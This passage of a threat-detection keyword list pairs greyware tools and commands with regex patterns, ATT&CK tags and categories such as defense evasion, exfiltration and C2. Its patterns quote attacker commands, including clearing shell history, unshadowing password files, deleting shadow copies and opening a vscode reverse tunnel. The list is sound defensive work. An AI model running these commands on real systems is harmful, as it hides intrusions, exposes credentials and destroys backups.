detection.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\Doc_ENG\\_Rootkit\sdetection\.txt.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\Update_UVS.exe*",".{0,1000}\\Update_UVS\.exe.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense 
Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\uvs_v415eng.zip*",".{0,1000}\\uvs_v415eng\.zip.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*dd90d845a111bc52b3d81dd597c5eaf0ef41d2278383a668f8932d8faefccbda*",".{0,1000}dd90d845a111bc52b3d81dd597c5eaf0ef41d2278383a668f8932d8faefccbda.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A" "*http://dsrt.dyndns.org:8888/uvs_freeupdate_en.htm*",".{0,1000}http\:\/\/dsrt\.dyndns\.org\:8888\/uvs_freeupdate_en\.htm.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*http://dsrt.dyndns.org:8888/uvs_register_en.htm*",".{0,1000}http\:\/\/dsrt\.dyndns\.org\:8888\/uvs_register_en\.htm.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense 
Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*PUA.Win32.uVirusSniffer.A*",".{0,1000}PUA\.Win32\.uVirusSniffer\.A.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#Avsignature","N/A","8","10","N/A","N/A","N/A","N/A" "*PUA:Win32/Packunwan*",".{0,1000}PUA\:Win32\/Packunwan.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#Avsignature","N/A","8","10","N/A","N/A","N/A","N/A" "*Universal.Virus.Sniffer.4.15.zip*",".{0,1000}Universal\.Virus\.Sniffer\.4\.15\.zip.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*Win32/UniversalVirusSniffer*",".{0,1000}Win32\/UniversalVirusSniffer.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#Avsignature","N/A","8","10","N/A","N/A","N/A","N/A" 
"*higioemojdadgdbhbbbkfbebbdlfjbip*",".{0,1000}higioemojdadgdbhbbbkfbebbdlfjbip.{0,1000}","greyware_tool_keyword","Unlimited VPN & Proxy by ibVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*",".{0,1000}unset\sHISTFILE\s\&\&\sHISTSIZE\=0\s\&\&\srm\s\-f\s\$HISTFILE\s\&\&\sunset\sHISTFILE.{0,1000}","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","N/A","10","8","751","265","2024-08-12T21:40:40Z","2021-09-08T20:33:18Z" "*unset HISTFILE*",".{0,1000}unset\sHISTFILE.{0,1000}","greyware_tool_keyword","unset","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*unshadow passwd shadow > *",".{0,1000}unshadow\spasswd\sshadow\s\>\s.{0,1000}","greyware_tool_keyword","unshadow","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools 
high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*/updog-*.tar.gz*",".{0,1000}\/updog\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*/updog.git*",".{0,1000}\/updog\.git.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*/updog/archive/updog-*",".{0,1000}\/updog\/archive\/updog\-.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*\updog-master\*",".{0,1000}\\updog\-master\\.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*pip* install updog*",".{0,1000}pip.{0,1000}\sinstall\supdog.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*sc0tfree/updog*",".{0,1000}sc0tfree\/updog.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*updog --*",".{0,1000}updog\s\-\-.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*updog -d /*",".{0,1000}updog\s\-d\s\/.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*updog -p *",".{0,1000}updog\s\-p\s.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*updog-master.zip*",".{0,1000}updog\-master\.zip.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z" "*bniikohfmajhdcffljgfeiklcbgffppl*",".{0,1000}bniikohfmajhdcffljgfeiklcbgffppl.{0,1000}","greyware_tool_keyword","Upnet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*eppiocemhmnlbhjplcgkofciiegomcon*",".{0,1000}eppiocemhmnlbhjplcgkofciiegomcon.{0,1000}","greyware_tool_keyword","Urban Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*almalgbpmcfpdaopimbdchdliminoign*",".{0,1000}almalgbpmcfpdaopimbdchdliminoign.{0,1000}","greyware_tool_keyword","Urban Shield","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://usaupload.com/account/ajax/load_files*",".{0,1000}https\:\/\/usaupload\.com\/account\/ajax\/load_files.{0,1000}","greyware_tool_keyword","usaupload","uploading files to usaupload","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://usaupload.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://usaupload.com/account/ajax/uploader*",".{0,1000}https\:\/\/usaupload\.com\/account\/ajax\/uploader.{0,1000}","greyware_tool_keyword","usaupload","uploading files to usaupload","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://usaupload.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\uTorrent\*",".{0,1000}\\uTorrent\\.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\utweb.exe*",".{0,1000}\\utweb\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AppData\Roaming\uTorrent*",".{0,1000}AppData\\Roaming\\uTorrent.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*uTorrent (1).exe*",".{0,1000}uTorrent\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*uTorrent.exe*",".{0,1000}uTorrent\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*utorrent_installer.exe*",".{0,1000}utorrent_installer\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*utweb_installer.exe*",".{0,1000}utweb_installer\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lejgfmmlngaigdmmikblappdafcmkndb*",".{0,1000}lejgfmmlngaigdmmikblappdafcmkndb.{0,1000}","greyware_tool_keyword","uVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bnijmipndnicefcdbhgcjoognndbgkep*",".{0,1000}bnijmipndnicefcdbhgcjoognndbgkep.{0,1000}","greyware_tool_keyword","Veee","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*aojlhgbkmkahabcmcpifbolnoichfeep*",".{0,1000}aojlhgbkmkahabcmcpifbolnoichfeep.{0,1000}","greyware_tool_keyword","VirtualShield VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*>RealVNC<*",".{0,1000}\>RealVNC\<.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>UltraVNC VNCViewer<*",".{0,1000}\>UltraVNC\sVNCViewer\<.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ProgramData\JWrapper-Remote Access\*.exe*",".{0,1000}ProgramData\\JWrapper\-Remote\sAccess\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","vncviewer","SimpleHelp or VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","simple-help.com","1","0","N/A","could be used by VNCViewer or SimpleHelp","10","10","N/A","N/A","N/A","N/A" "*RealVNC.VNCViewer*",".{0,1000}RealVNC\.VNCViewer.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*vncviewer *.*:5901*",".{0,1000}vncviewer\s.{0,1000}\..{0,1000}\:5901.{0,1000}","greyware_tool_keyword","vncviewer","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","RMM","N/A","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A" "*VNCViewer.exe*",".{0,1000}VNCViewer\.exe.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*gjknjjomckknofjidppipffbpoekiipm*",".{0,1000}gjknjjomckknofjidppipffbpoekiipm.{0,1000}","greyware_tool_keyword","VPN Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*akeehkgglkmpapdnanoochpfmeghfdln*",".{0,1000}akeehkgglkmpapdnanoochpfmeghfdln.{0,1000}","greyware_tool_keyword","VPN Master","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*foiopecknacmiihiocgdjgbjokkpkohc*",".{0,1000}foiopecknacmiihiocgdjgbjokkpkohc.{0,1000}","greyware_tool_keyword","VPN Professional","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*lnfdmdhmfbimhhpaeocncdlhiodoblbd*",".{0,1000}lnfdmdhmfbimhhpaeocncdlhiodoblbd.{0,1000}","greyware_tool_keyword","VPN PROXY MASTER","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*mpcaainmfjjigeicjnlkdfajbioopjko*",".{0,1000}mpcaainmfjjigeicjnlkdfajbioopjko.{0,1000}","greyware_tool_keyword","VPN Unlimited Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*kcndmbbelllkmioekdagahekgimemejo*",".{0,1000}kcndmbbelllkmioekdagahekgimemejo.{0,1000}","greyware_tool_keyword","VPN.AC","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bibjcjfmgapbfoljiojpipaooddpkpai*",".{0,1000}bibjcjfmgapbfoljiojpipaooddpkpai.{0,1000}","greyware_tool_keyword","VPN-free.pro","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bkkgdjpomdnfemhhkalfkogckjdkcjkg*",".{0,1000}bkkgdjpomdnfemhhkalfkogckjdkcjkg.{0,1000}","greyware_tool_keyword","VPNMatic","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - 
TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*aue.rel.tunnels.api.visualstudio.com*",".{0,1000}aue\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*aue-data.rel.tunnels.api.visualstudio.com*",".{0,1000}aue\-data\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*code.exe tunnel --accept-server-license-terms --name *",".{0,1000}code\.exe\stunnel\s\-\-accept\-server\-license\-terms\s\-\-name\s.{0,1000}","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","0","N/A","risk of False positive","10","10","N/A","N/A","N/A","N/A" "*global.rel.tunnels.api.visualstudio.com*",".{0,1000}global\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - 
TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","1","N/A","risk of False positive","10","10","N/A","N/A","N/A","N/A" "*global.rel.tunnels.api.visualstudio.com*",".{0,1000}global\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe delete shadows*",".{0,1000}\.exe\sdelete\sshadows.{0,1000}","greyware_tool_keyword","vssadmin","inhibiting recovery by deleting backup and recovery data to prevent system recovery after an attack","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*vssadmin create shadow /for=C:*",".{0,1000}vssadmin\screate\sshadow\s\/for\=C\:.{0,1000}","greyware_tool_keyword","vssadmin","the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system","T1005","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*vssadmin create shadow /for=C:* \Temp\*.tmp*",".{0,1000}vssadmin\screate\sshadow\s\/for\=C\:.{0,1000}\s\\Temp\\.{0,1000}\.tmp.{0,1000}","greyware_tool_keyword","vssadmin","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*vssadmin delete shadows*",".{0,1000}vssadmin\sdelete\sshadows.{0,1000}","greyware_tool_keyword","vssadmin","inhibiting recovery by deleting backup and 
